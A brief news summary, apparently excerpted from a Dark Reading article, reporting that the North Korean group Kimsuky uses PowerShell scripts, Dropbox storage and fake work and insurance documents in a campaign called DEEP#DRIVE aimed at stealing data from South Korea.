North Korean threat actors are using trusted services to evade detection. These living-off-the-land (LotL) techniques have been observed in a recent Kimsuky campaign using PowerShell scripts and storing data in Dropbox folders. In the campaign is being referred to as “DEEP#DRIVE,” Kimsuky has used fake work logs, insurance documents, and other crypto-files to convince users to download and run malicious files. The threat group appears to be focused on stealing sensitive data from South Korea. 

Read more: https://www.darkreading.com/cyberattacks-data-breaches/north-koreans-kimsuky-attacks-rivals-trusted-platforms